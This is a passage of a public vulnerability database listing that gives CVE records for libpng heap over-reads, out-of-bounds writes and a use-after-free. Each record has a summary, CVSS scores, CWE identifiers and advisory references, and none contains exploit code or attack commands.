"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/749"
},
{
"name": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821"
}
],
"source": {
"advisory": "GHSA-qpr4-xm66-hww6",
"discovery": "UNKNOWN"
},
"title": "LIBPNG is vulnerable to a heap buffer over-read in `png_write_image_8bit` with grayscale+alpha or RGB/RGBA images"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64506",
"datePublished": "2025-11-24T23:41:09.207Z",
"dateReserved": "2025-11-05T21:15:39.399Z",
"dateUpdated": "2025-11-25T19:27:04.161Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-64505 (GCVE-0-2025-64505)
Vulnerability from nvd – Published: 2025-11-24 23:38 – Updated: 2025-11-25 18:55
VLAI?
Title
LIBPNG is vulnerable to a heap buffer overflow in `png_do_quantize` via malformed palette index
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.
Severity ?
6.1 (Medium)
CWE
- CWE-125 - Out-of-bounds Read
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64505",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-25T18:55:44.084881Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-25T18:55:50.619Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.51"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng\u0027s png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-24T23:38:40.405Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42"
},
{
"name": "https://github.com/pnggroup/libpng/pull/748",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/748"
},
{
"name": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37"
}
],
"source": {
"advisory": "GHSA-4952-h5wq-4m42",
"discovery": "UNKNOWN"
},
"title": "LIBPNG is vulnerable to a heap buffer overflow in `png_do_quantize` via malformed palette index"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64505",
"datePublished": "2025-11-24T23:38:40.405Z",
"dateReserved": "2025-11-05T19:12:25.104Z",
"dateUpdated": "2025-11-25T18:55:50.619Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33636 (GCVE-0-2026-33636)
Vulnerability from cvelistv5 – Published: 2026-03-26 16:51 – Updated: 2026-03-26 18:45
VLAI?
Title
LIBPNG has ARM NEON Palette Expansion Out-of-Bounds Read on AArch64
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng's ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue.
Severity ?
7.6 (High)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33636",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-26T18:45:14.491475Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T18:45:26.631Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.36, \u003c 1.6.56"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng\u0027s ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T16:51:58.289Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2"
},
{
"name": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869"
},
{
"name": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3"
}
],
"source": {
"advisory": "GHSA-wjr5-c57x-95m2",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has ARM NEON Palette Expansion Out-of-Bounds Read on AArch64"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33636",
"datePublished": "2026-03-26T16:51:58.289Z",
"dateReserved": "2026-03-23T14:24:11.619Z",
"dateUpdated": "2026-03-26T18:45:26.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33416 (GCVE-0-2026-33416)
Vulnerability from cvelistv5 – Published: 2026-03-26 16:48 – Updated: 2026-04-01 03:55
VLAI?
Title
LIBPNG has use-after-free via pointer aliasing in `png_set_tRNS` and `png_set_PLTE`
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr->trans_alpha = info_ptr->trans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr->palette = png_ptr->palette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue.
Severity ?
7.5 (High)
CWE
- CWE-416 - Use After Free
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33416",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-31T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T03:55:17.603Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.1, \u003c 1.6.56"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr-\u003etrans_alpha = info_ptr-\u003etrans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr-\u003epalette = png_ptr-\u003epalette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416: Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T16:48:54.174Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j"
},
{
"name": "https://github.com/pnggroup/libpng/pull/824",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/824"
},
{
"name": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb"
},
{
"name": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667"
},
{
"name": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25"
},
{
"name": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1"
}
],
"source": {
"advisory": "GHSA-m4pc-p4q3-4c7j",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has use-after-free via pointer aliasing in `png_set_tRNS` and `png_set_PLTE`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33416",
"datePublished": "2026-03-26T16:48:54.174Z",
"dateReserved": "2026-03-19T17:02:34.172Z",
"dateUpdated": "2026-04-01T03:55:17.603Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-25646 (GCVE-0-2026-25646)
Vulnerability from cvelistv5 – Published: 2026-02-10 17:04 – Updated: 2026-02-11 15:31
VLAI?
Title
LIBPNG has a heap buffer overflow in png_set_quantize
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55.
Severity ?
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2026-02-10T17:25:31.583Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/02/09/7"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-25646",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-11T15:31:50.552532Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-11T15:31:58.665Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.55"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user\u0027s display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-126",
"description": "CWE-126: Buffer Over-read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-10T17:04:38.501Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3"
},
{
"name": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88"
}
],
"source": {
"advisory": "GHSA-g8hp-mq4h-rqm3",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has a heap buffer overflow in png_set_quantize"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-25646",
"datePublished": "2026-02-10T17:04:38.501Z",
"dateReserved": "2026-02-04T05:15:41.791Z",
"dateUpdated": "2026-02-11T15:31:58.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-28162 (GCVE-0-2025-28162)
Vulnerability from cvelistv5 – Published: 2026-01-27 00:00 – Updated: 2026-01-29 14:45
VLAI?
Summary
Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via the pngimage with AddressSanitizer (ASan), the program leaks memory in various locations, eventually leading to high memory usage and causing the program to become unresponsive
Severity ?
5.5 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-28162",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-29T14:44:12.627940Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-29T14:45:03.126Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via the pngimage with AddressSanitizer (ASan), the program leaks memory in various locations, eventually leading to high memory usage and causing the program to become unresponsive"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T15:49:47.958Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/pnggroup/libpng/issues/656"
},
{
"url": "https://gist.github.com/kittener/fbfdb9b5610c6b3db0d5dea045a07c60"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-28162",
"datePublished": "2026-01-27T00:00:00.000Z",
"dateReserved": "2025-03-11T00:00:00.000Z",
"dateUpdated": "2026-01-29T14:45:03.126Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-28164 (GCVE-0-2025-28164)
Vulnerability from cvelistv5 – Published: 2026-01-27 00:00 – Updated: 2026-01-28 16:35
VLAI?
Summary
Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.
Severity ?
5.5 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-28164",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-28T16:35:03.471007Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-28T16:35:43.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T15:30:31.952Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/pnggroup/libpng/issues/655"
},
{
"url": "https://gist.github.com/kittener/506516f8c22178005b4379c8b2a7de20"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-28164",
"datePublished": "2026-01-27T00:00:00.000Z",
"dateReserved": "2025-03-11T00:00:00.000Z",
"dateUpdated": "2026-01-28T16:35:43.323Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-22801 (GCVE-0-2026-22801)
Vulnerability from cvelistv5 – Published: 2026-01-12 22:57 – Updated: 2026-01-13 19:37
VLAI?
Title
LIBPNG has an integer truncation causing heap buffer over-read in png_image_write_*
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54.
Severity ?
6.8 (Medium)
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-22801",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-13T19:37:38.282435Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T19:37:45.414Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.6.26 to 1.6.53, there is an integer truncation in the libpng simplified write API functions png_write_image_16bit and png_write_image_8bit causes heap buffer over-read when the caller provides a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes. The bug was introduced in libpng 1.6.26 (October 2016) by casts added to silence compiler warnings on 16-bit systems. This vulnerability is fixed in 1.6.54."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190: Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-12T22:57:58.288Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-vgjq-8cw5-ggw8"
}
],
"source": {
"advisory": "GHSA-vgjq-8cw5-ggw8",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has an integer truncation causing heap buffer over-read in png_image_write_*"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-22801",
"datePublished": "2026-01-12T22:57:58.288Z",
"dateReserved": "2026-01-09T22:50:10.287Z",
"dateUpdated": "2026-01-13T19:37:45.414Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-22695 (GCVE-0-2026-22695)
Vulnerability from cvelistv5 – Published: 2026-01-12 22:55 – Updated: 2026-01-13 19:07
VLAI?
Title
LIBPNG has a heap buffer over-read in png_image_read_direct_scaled (regression from CVE-2025-65018 fix)
Summary
